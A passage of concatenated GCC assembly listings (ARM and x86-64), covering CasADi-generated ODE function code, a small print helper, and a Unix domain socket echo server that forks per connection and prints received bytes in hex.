r1, {r2-r3} .L26: ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] cmp r3, #0 beq .L27 ldr r3, [fp, #-24] add r3, r3, #4 ldr r3, [r3] add r3, r3, #40 ldmia r3, {r2-r3} b .L28 .L27: mov r2, #0 mov r3, #0 .L28: str r2, [fp, #-20] str r3, [fp, #-16] ldr r3, [fp, #-24] add r3, r3, #8 ldr r3, [r3] cmp r3, #0 beq .L29 ldr r3, [fp, #-24] add r3, r3, #8 ldr r3, [r3] add r3, r3, #16 ldmia r3, {r2-r3} b .L30 .L29: mov r2, #0 mov r3, #0 .L30: str r2, [fp, #-12] str r3, [fp, #-8] sub r3, fp, #12 ldmia r3, {r2-r3} sub r1, fp, #20 ldmia r1, {r0-r1} bl __aeabi_dsub mov r2, r0 mov r3, r1 str r2, [fp, #-20] str r3, [fp, #-16] ldr r3, [fp, #-28] ldr r3, [r3] cmp r3, #0 beq .L31 ldr r3, [fp, #-28] ldr r3, [r3] add r1, r3, #40 sub r3, fp, #20 ldmia r3, {r2-r3} stm r1, {r2-r3} .L31: mov r3, #0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size impl_ode_fun_chain_nm2_f0, .-impl_ode_fun_chain_nm2_f0 .align 2 .global casadi_impl_ode_fun_chain_nm2 .syntax unified .arm .fpu softvfp .type casadi_impl_ode_fun_chain_nm2, %function casadi_impl_ode_fun_chain_nm2: @ args = 4, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-8] str r1, [fp, #-12] str r2, [fp, #-16] str r3, [fp, #-20] ldr r3, [fp, #4] str r3, [sp] ldr r3, [fp, #-20] ldr r2, [fp, #-16] ldr r1, [fp, #-12] ldr r0, [fp, #-8] bl impl_ode_fun_chain_nm2_f0 mov r3, r0 mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .size casadi_impl_ode_fun_chain_nm2, .-casadi_impl_ode_fun_chain_nm2 .align 2 .global casadi_impl_ode_fun_chain_nm2_incref .syntax unified .arm .fpu softvfp .type casadi_impl_ode_fun_chain_nm2_incref, %function casadi_impl_ode_fun_chain_nm2_incref: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size casadi_impl_ode_fun_chain_nm2_incref, .-casadi_impl_ode_fun_chain_nm2_incref .align 2 .global casadi_impl_ode_fun_chain_nm2_decref .syntax unified .arm .fpu softvfp .type casadi_impl_ode_fun_chain_nm2_decref, %function casadi_impl_ode_fun_chain_nm2_decref: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 nop add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size casadi_impl_ode_fun_chain_nm2_decref, .-casadi_impl_ode_fun_chain_nm2_decref .align 2 .global casadi_impl_ode_fun_chain_nm2_n_in .syntax unified .arm .fpu softvfp .type casadi_impl_ode_fun_chain_nm2_n_in, %function casadi_impl_ode_fun_chain_nm2_n_in: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #3 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size casadi_impl_ode_fun_chain_nm2_n_in, .-casadi_impl_ode_fun_chain_nm2_n_in .align 2 .global casadi_impl_ode_fun_chain_nm2_n_out .syntax unified .arm .fpu softvfp .type casadi_impl_ode_fun_chain_nm2_n_out, %function casadi_impl_ode_fun_chain_nm2_n_out: @ args = 0, pretend = 0, frame = 0 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 mov r3, #1 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size casadi_impl_ode_fun_chain_nm2_n_out, .-casadi_impl_ode_fun_chain_nm2_n_out .section .rodata .align 2 .LC0: .ascii "i0\000" .align 2 .LC1: .ascii "i1\000" .align 2 .LC2: .ascii "i2\000" .text .align 2 .global casadi_impl_ode_fun_chain_nm2_name_in .syntax unified .arm .fpu softvfp .type casadi_impl_ode_fun_chain_nm2_name_in, %function casadi_impl_ode_fun_chain_nm2_name_in: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #2 beq .L42 ldr r3, [fp, #-8] cmp r3, #2 bgt .L43 ldr r3, [fp, #-8] cmp r3, #0 beq .L44 ldr r3, [fp, #-8] cmp r3, #1 beq .L45 b .L43 .L44: ldr r3, .L47 b .L46 .L45: ldr r3, .L47+4 b .L46 .L42: ldr r3, .L47+8 b .L46 .L43: mov r3, #0 .L46: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L48: .align 2 .L47: .word .LC0 .word .LC1 .word .LC2 .size casadi_impl_ode_fun_chain_nm2_name_in, .-casadi_impl_ode_fun_chain_nm2_name_in .section .rodata .align 2 .LC3: .ascii "o0\000" .text .align 2 .global casadi_impl_ode_fun_chain_nm2_name_out .syntax unified .arm .fpu softvfp .type casadi_impl_ode_fun_chain_nm2_name_out, %function casadi_impl_ode_fun_chain_nm2_name_out: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #0 bne .L50 ldr r3, .L52 b .L51 .L50: mov r3, #0 .L51: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L53: .align 2 .L52: .word .LC3 .size casadi_impl_ode_fun_chain_nm2_name_out, .-casadi_impl_ode_fun_chain_nm2_name_out .align 2 .global casadi_impl_ode_fun_chain_nm2_sparsity_in .syntax unified .arm .fpu softvfp .type casadi_impl_ode_fun_chain_nm2_sparsity_in, %function casadi_impl_ode_fun_chain_nm2_sparsity_in: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #2 beq .L55 ldr r3, [fp, #-8] cmp r3, #2 bgt .L56 ldr r3, [fp, #-8] cmp r3, #0 beq .L57 ldr r3, [fp, #-8] cmp r3, #1 beq .L58 b .L56 .L57: ldr r3, .L60 b .L59 .L58: ldr r3, .L60 b .L59 .L55: ldr r3, .L60+4 b .L59 .L56: mov r3, #0 .L59: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L61: .align 2 .L60: .word impl_ode_fun_chain_nm2_s0 .word impl_ode_fun_chain_nm2_s1 .size casadi_impl_ode_fun_chain_nm2_sparsity_in, .-casadi_impl_ode_fun_chain_nm2_sparsity_in .align 2 .global casadi_impl_ode_fun_chain_nm2_sparsity_out .syntax unified .arm .fpu softvfp .type casadi_impl_ode_fun_chain_nm2_sparsity_out, %function casadi_impl_ode_fun_chain_nm2_sparsity_out: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #12 str r0, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #0 bne .L63 ldr r3, .L65 b .L64 .L63: mov r3, #0 .L64: mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .L66: .align 2 .L65: .word impl_ode_fun_chain_nm2_s0 .size casadi_impl_ode_fun_chain_nm2_sparsity_out, .-casadi_impl_ode_fun_chain_nm2_sparsity_out .align 2 .global casadi_impl_ode_fun_chain_nm2_work .syntax unified .arm .fpu softvfp .type casadi_impl_ode_fun_chain_nm2_work, %function casadi_impl_ode_fun_chain_nm2_work: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 @ link register save eliminated. str fp, [sp, #-4]! add fp, sp, #0 sub sp, sp, #20 str r0, [fp, #-8] str r1, [fp, #-12] str r2, [fp, #-16] str r3, [fp, #-20] ldr r3, [fp, #-8] cmp r3, #0 beq .L68 ldr r3, [fp, #-8] mov r2, #3 str r2, [r3] .L68: ldr r3, [fp, #-12] cmp r3, #0 beq .L69 ldr r3, [fp, #-12] mov r2, #1 str r2, [r3] .L69: ldr r3, [fp, #-16] cmp r3, #0 beq .L70 ldr r3, [fp, #-16] mov r2, #0 str r2, [r3] .L70: ldr r3, [fp, #-20] cmp r3, #0 beq .L71 ldr r3, [fp, #-20] mov r2, #0 str r2, [r3] .L71: mov r3, #0 mov r0, r3 add sp, fp, #0 @ sp needed ldr fp, [sp], #4 bx lr .size casadi_impl_ode_fun_chain_nm2_work, .-casadi_impl_ode_fun_chain_nm2_work .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "860626.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "\n%s" .text .globl printing .type printing, @function printing: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR -8[rbp] mov rsi, rax lea rdi, .LC0[rip] mov eax, 0 call printf@PLT nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size printing, .-printing .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "860626.c" .text .section .rodata .align 2 .LC0: .ascii "\012%s\000" .text .align 2 .global printing .syntax unified .arm .fpu softvfp .type printing, %function printing: @ args = 0, pretend = 0, frame = 8 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #8 str r0, [fp, #-8] ldr r1, [fp, #-8] ldr r0, .L2 bl printf nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L3: .align 2 .L2: .word .LC0 .size printing, .-printing .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "257044.c" .intel_syntax noprefix .text .section .rodata .LC0: .string ", " .LC1: .string "0x%02hhx" .text .globl fprintBytes .type fprintBytes, @function fprintBytes: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov QWORD PTR -24[rbp], rdi mov QWORD PTR -32[rbp], rsi mov QWORD PTR -40[rbp], rdx mov QWORD PTR -8[rbp], 0 jmp .L2 .L4: cmp QWORD PTR -8[rbp], 0 je .L3 mov rax, QWORD PTR -24[rbp] mov rcx, rax mov edx, 2 mov esi, 1 lea rdi, .LC0[rip] call fwrite@PLT .L3: mov rdx, QWORD PTR -32[rbp] mov rax, QWORD PTR -8[rbp] add rax, rdx movzx eax, BYTE PTR [rax] movsx edx, al mov rax, QWORD PTR -24[rbp] lea rsi, .LC1[rip] mov rdi, rax mov eax, 0 call fprintf@PLT add QWORD PTR -8[rbp], 1 .L2: mov rax, QWORD PTR -8[rbp] cmp rax, QWORD PTR -40[rbp] jb .L4 nop nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size fprintBytes, .-fprintBytes .globl fprintSockaddrUn .type fprintSockaddrUn, @function fprintSockaddrUn: .LFB7: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov QWORD PTR -16[rbp], rsi mov rax, QWORD PTR -16[rbp] lea rdx, 2[rax] mov rax, QWORD PTR -8[rbp] mov rsi, rax mov rdi, rdx call fputs@PLT nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE7: .size fprintSockaddrUn, .-fprintSockaddrUn .section .rodata .LC2: .string "inet_ntop" .LC3: .string "errno: %d\n" .LC4: .string "%s:%hu" .text .globl fprintSockaddrIn .type fprintSockaddrIn, @function fprintSockaddrIn: .LFB8: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 64 mov QWORD PTR -56[rbp], rdi mov QWORD PTR -64[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR -64[rbp] lea rsi, 4[rax] lea rax, -32[rbp] mov ecx, 16 mov rdx, rax mov edi, 2 call inet_ntop@PLT mov QWORD PTR -40[rbp], rax cmp QWORD PTR -40[rbp], 0 jne .L7 call __errno_location@PLT mov eax, DWORD PTR [rax] mov DWORD PTR -44[rbp], eax lea rdi, .LC2[rip] call perror@PLT mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -44[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call fprintf@PLT jmp .L6 .L7: mov rax, QWORD PTR -64[rbp] movzx eax, WORD PTR 2[rax] movzx eax, ax mov edi, eax call ntohs@PLT movzx ecx, ax lea rdx, -32[rbp] mov rax, QWORD PTR -56[rbp] lea rsi, .LC4[rip] mov rdi, rax mov eax, 0 call fprintf@PLT .L6: mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L9 call __stack_chk_fail@PLT .L9: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE8: .size fprintSockaddrIn, .-fprintSockaddrIn .section .rodata .LC5: .string "if_indextoname" .LC6: .string "%%%s" .LC7: .string ":%hu" .text .globl fprintSockaddrIn6 .type fprintSockaddrIn6, @function fprintSockaddrIn6: .LFB9: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 add rsp, -128 mov QWORD PTR -120[rbp], rdi mov QWORD PTR -128[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov rax, QWORD PTR -128[rbp] lea rsi, 8[rax] lea rax, -64[rbp] mov ecx, 46 mov rdx, rax mov edi, 10 call inet_ntop@PLT mov QWORD PTR -96[rbp], rax cmp QWORD PTR -96[rbp], 0 jne .L11 call __errno_location@PLT mov eax, DWORD PTR [rax] mov DWORD PTR -100[rbp], eax lea rdi, .LC2[rip] call perror@PLT mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -100[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call fprintf@PLT jmp .L10 .L11: mov rdx, QWORD PTR -120[rbp] lea rax, -64[rbp] mov rsi, rdx mov rdi, rax call fputs@PLT mov rax, QWORD PTR -128[rbp] mov eax, DWORD PTR 24[rax] test eax, eax je .L13 mov rax, QWORD PTR -128[rbp] mov eax, DWORD PTR 24[rax] lea rdx, -80[rbp] mov rsi, rdx mov edi, eax call if_indextoname@PLT mov QWORD PTR -88[rbp], rax cmp QWORD PTR -88[rbp], 0 jne .L14 call __errno_location@PLT mov eax, DWORD PTR [rax] mov DWORD PTR -104[rbp], eax lea rdi, .LC5[rip] call perror@PLT mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -104[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call fprintf@PLT jmp .L10 .L14: lea rdx, -80[rbp] mov rax, QWORD PTR -120[rbp] lea rsi, .LC6[rip] mov rdi, rax mov eax, 0 call fprintf@PLT .L13: mov rax, QWORD PTR -128[rbp] movzx eax, WORD PTR 2[rax] movzx eax, ax mov edi, eax call ntohs@PLT movzx edx, ax mov rax, QWORD PTR -120[rbp] lea rsi, .LC7[rip] mov rdi, rax mov eax, 0 call fprintf@PLT .L10: mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L16 call __stack_chk_fail@PLT .L16: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE9: .size fprintSockaddrIn6, .-fprintSockaddrIn6 .section .rodata .LC8: .string "unknown sa_family: 0x%04hx" .LC9: .string ", sa_data: [" .text .globl fprintSockaddrUnknown .type fprintSockaddrUnknown, @function fprintSockaddrUnknown: .LFB10: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov QWORD PTR -16[rbp], rsi mov rax, QWORD PTR -16[rbp] movzx eax, WORD PTR [rax] movzx edx, ax mov rax, QWORD PTR -8[rbp] lea rsi, .LC8[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov rax, QWORD PTR -8[rbp] mov rcx, rax mov edx, 12 mov esi, 1 lea rdi, .LC9[rip] call fwrite@PLT mov rax, QWORD PTR -16[rbp] lea rcx, 2[rax] mov rax, QWORD PTR -8[rbp] mov edx, 14 mov rsi, rcx mov rdi, rax call fprintBytes mov rax, QWORD PTR -8[rbp] mov rsi, rax mov edi, 93 call fputc@PLT nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE10: .size fprintSockaddrUnknown, .-fprintSockaddrUnknown .globl fprintSockaddr .type fprintSockaddr, @function fprintSockaddr: .LFB11: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov QWORD PTR -16[rbp], rsi mov rax, QWORD PTR -16[rbp] movzx eax, WORD PTR [rax] movzx eax, ax cmp eax, 10 je .L19 cmp eax, 10 jg .L20 cmp eax, 1 je .L21 cmp eax, 2 je .L22 jmp .L20 .L21: mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -8[rbp] mov rsi, rdx mov rdi, rax call fprintSockaddrUn jmp .L23 .L22: mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -8[rbp] mov rsi, rdx mov rdi, rax call fprintSockaddrIn jmp .L23 .L19: mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -8[rbp] mov rsi, rdx mov rdi, rax call fprintSockaddrIn6 jmp .L23 .L20: mov rdx, QWORD PTR -16[rbp] mov rax, QWORD PTR -8[rbp] mov rsi, rdx mov rdi, rax call fprintSockaddrUnknown nop .L23: nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE11: .size fprintSockaddr, .-fprintSockaddr .section .rodata .LC10: .string "recv" .LC11: .string "[EOF]" .LC12: .string "send" .text .globl childProc .type childProc, @function childProc: .LFB12: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 1088 mov DWORD PTR -1076[rbp], edi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax .L25: lea rsi, -1040[rbp] mov eax, DWORD PTR -1076[rbp] mov ecx, 0 mov edx, 1024 mov edi, eax call recv@PLT mov QWORD PTR -1056[rbp], rax cmp QWORD PTR -1056[rbp], -1 jne .L26 call __errno_location@PLT mov eax, DWORD PTR [rax] mov DWORD PTR -1060[rbp], eax lea rdi, .LC10[rip] call perror@PLT mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -1060[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call fprintf@PLT cmp DWORD PTR -1060[rbp], 11 je .L25 cmp DWORD PTR -1060[rbp], 4 jne .L37 jmp .L25 .L26: cmp QWORD PTR -1056[rbp], 0 jne .L30 lea rdi, .LC11[rip] mov eax, 0 call printf@PLT jmp .L24 .L30: mov rdx, QWORD PTR -1056[rbp] mov rax, QWORD PTR stdout[rip] lea rcx, -1040[rbp] mov rsi, rcx mov rdi, rax call fprintBytes .L31: mov rdx, QWORD PTR -1056[rbp] lea rsi, -1040[rbp] mov eax, DWORD PTR -1076[rbp] mov ecx, 0 mov edi, eax call send@PLT mov QWORD PTR -1048[rbp], rax cmp QWORD PTR -1048[rbp], -1 jne .L25 call __errno_location@PLT mov eax, DWORD PTR [rax] mov DWORD PTR -1064[rbp], eax lea rdi, .LC12[rip] call perror@PLT mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -1064[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call fprintf@PLT cmp DWORD PTR -1064[rbp], 11 je .L25 cmp DWORD PTR -1064[rbp], 4 jne .L38 jmp .L25 .L37: nop jmp .L24 .L38: nop .L24: mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L36 call __stack_chk_fail@PLT .L36: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE12: .size childProc, .-childProc .section .rodata .LC13: .string "accept" .LC14: .string "fork" .text .globl acceptMain .type acceptMain, @function acceptMain: .LFB13: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 push rbx sub rsp, 184 .cfi_offset 3, -24 mov DWORD PTR -180[rbp], edi mov rax, QWORD PTR fs:40 mov QWORD PTR -24[rbp], rax xor eax, eax lea rdx, -144[rbp] mov eax, 0 mov ecx, 13 mov rdi, rdx rep stosq mov rdx, rdi mov DWORD PTR [rdx], eax add rdx, 4 mov WORD PTR [rdx], ax add rdx, 2 mov DWORD PTR -164[rbp], 110 mov DWORD PTR -160[rbp], -1 lea rdx, -164[rbp] lea rcx, -144[rbp] mov eax, DWORD PTR -180[rbp] mov rsi, rcx mov edi, eax call accept@PLT mov DWORD PTR -160[rbp], eax cmp DWORD PTR -160[rbp], -1 jne .L40 call __errno_location@PLT mov eax, DWORD PTR [rax] mov DWORD PTR -148[rbp], eax lea rdi, .LC13[rip] call perror@PLT mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -148[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call fprintf@PLT jmp .L41 .L40: call fork@PLT mov DWORD PTR -156[rbp], eax cmp DWORD PTR -156[rbp], -1 jne .L42 call __errno_location@PLT mov eax, DWORD PTR [rax] mov DWORD PTR -152[rbp], eax lea rdi, .LC14[rip] call perror@PLT mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -152[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call fprintf@PLT jmp .L41 .L42: cmp DWORD PTR -156[rbp], 0 jne .L43 mov eax, DWORD PTR -180[rbp] mov edi, eax call close@PLT mov edx, DWORD PTR -160[rbp] sub rsp, 112 mov rax, rsp mov rcx, QWORD PTR -144[rbp] mov rbx, QWORD PTR -136[rbp] mov QWORD PTR [rax], rcx mov QWORD PTR 8[rax], rbx mov rcx, QWORD PTR -128[rbp] mov rbx, QWORD PTR -120[rbp] mov QWORD PTR 16[rax], rcx mov QWORD PTR 24[rax], rbx mov rcx, QWORD PTR -112[rbp] mov rbx, QWORD PTR -104[rbp] mov QWORD PTR 32[rax], rcx mov QWORD PTR 40[rax], rbx mov rcx, QWORD PTR -96[rbp] mov rbx, QWORD PTR -88[rbp] mov QWORD PTR 48[rax], rcx mov QWORD PTR 56[rax], rbx mov rcx, QWORD PTR -80[rbp] mov rbx, QWORD PTR -72[rbp] mov QWORD PTR 64[rax], rcx mov QWORD PTR 72[rax], rbx mov rcx, QWORD PTR -64[rbp] mov rbx, QWORD PTR -56[rbp] mov QWORD PTR 80[rax], rcx mov QWORD PTR 88[rax], rbx mov rcx, QWORD PTR -48[rbp] mov QWORD PTR 96[rax], rcx mov ecx, DWORD PTR -40[rbp] mov DWORD PTR 104[rax], ecx movzx ecx, WORD PTR -36[rbp] mov WORD PTR 108[rax], cx mov edi, edx call childProc add rsp, 112 mov edi, 0 call exit@PLT .L43: mov eax, DWORD PTR -160[rbp] mov edi, eax call close@PLT mov DWORD PTR -160[rbp], -1 .L41: cmp DWORD PTR -160[rbp], -1 je .L44 mov eax, DWORD PTR -160[rbp] mov edi, eax call close@PLT .L44: nop mov rbx, QWORD PTR -24[rbp] sub rbx, QWORD PTR fs:40 je .L45 call __stack_chk_fail@PLT .L45: mov rbx, QWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE13: .size acceptMain, .-acceptMain .section .rodata .LC15: .string "usage: %s path\n" .LC16: .string "unlink" .LC17: .string "socket" .align 8 .LC18: .string "path too long. path: %zu, sun.sun_path: %zu\n" .LC19: .string "bind" .LC20: .string "listen" .text .globl main .type main, @function main: .LFB14: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 208 mov DWORD PTR -196[rbp], edi mov QWORD PTR -208[rbp], rsi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov DWORD PTR -180[rbp], 1 mov QWORD PTR -152[rbp], 0 cmp DWORD PTR -196[rbp], 1 jg .L47 mov rax, QWORD PTR -208[rbp] mov rdx, QWORD PTR [rax] mov rax, QWORD PTR stderr[rip] lea rsi, .LC15[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov eax, 1 jmp .L56 .L47: mov rax, QWORD PTR -208[rbp] mov rax, QWORD PTR 8[rax] mov QWORD PTR -152[rbp], rax mov rax, QWORD PTR -152[rbp] mov rdi, rax call unlink@PLT mov DWORD PTR -176[rbp], eax cmp DWORD PTR -176[rbp], 0 je .L49 call __errno_location@PLT mov eax, DWORD PTR [rax] mov DWORD PTR -172[rbp], eax cmp DWORD PTR -172[rbp], 2 je .L49 lea rdi, .LC16[rip] call perror@PLT mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -172[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov eax, 1 jmp .L56 .L49: mov DWORD PTR -168[rbp], -1 mov edx, 0 mov esi, 1 mov edi, 1 call socket@PLT mov DWORD PTR -168[rbp], eax cmp DWORD PTR -168[rbp], -1 jne .L50 call __errno_location@PLT mov eax, DWORD PTR [rax] mov DWORD PTR -156[rbp], eax lea rdi, .LC17[rip] call perror@PLT mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -156[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call fprintf@PLT jmp .L51 .L50: lea rdx, -128[rbp] mov eax, 0 mov ecx, 13 mov rdi, rdx rep stosq mov rdx, rdi mov DWORD PTR [rdx], eax add rdx, 4 mov WORD PTR [rdx], ax add rdx, 2 mov WORD PTR -128[rbp], 1 mov rax, QWORD PTR -152[rbp] mov rdi, rax call strlen@PLT mov QWORD PTR -144[rbp], rax mov QWORD PTR -136[rbp], 107 mov rax, QWORD PTR -144[rbp] cmp rax, QWORD PTR -136[rbp] jbe .L52 mov rax, QWORD PTR stderr[rip] mov rcx, QWORD PTR -136[rbp] mov rdx, QWORD PTR -144[rbp] lea rsi, .LC18[rip] mov rdi, rax mov eax, 0 call fprintf@PLT jmp .L51 .L52: mov rax, QWORD PTR -152[rbp] lea rdx, -128[rbp] lea rcx, 2[rdx] mov edx, 107 mov rsi, rax mov rdi, rcx call strncpy@PLT lea rcx, -128[rbp] mov eax, DWORD PTR -168[rbp] mov edx, 110 mov rsi, rcx mov edi, eax call bind@PLT mov DWORD PTR -176[rbp], eax cmp DWORD PTR -176[rbp], -1 jne .L53 call __errno_location@PLT mov eax, DWORD PTR [rax] mov DWORD PTR -160[rbp], eax lea rdi, .LC19[rip] call perror@PLT mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -160[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call fprintf@PLT jmp .L51 .L53: mov eax, DWORD PTR -168[rbp] mov esi, 10 mov edi, eax call listen@PLT mov DWORD PTR -176[rbp], eax cmp DWORD PTR -176[rbp], -1 jne .L54 call __errno_location@PLT mov eax, DWORD PTR [rax] mov DWORD PTR -164[rbp], eax lea rdi, .LC20[rip] call perror@PLT mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -164[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call fprintf@PLT jmp .L51 .L54: mov eax, DWORD PTR -168[rbp] mov edi, eax call acceptMain jmp .L54 .L51: cmp DWORD PTR -168[rbp], -1 je .L55 mov eax, DWORD PTR -168[rbp] mov edi, eax call close@PLT .L55: mov eax, DWORD PTR -180[rbp] .L56: mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L57 call __stack_chk_fail@PLT .L57: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE14: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
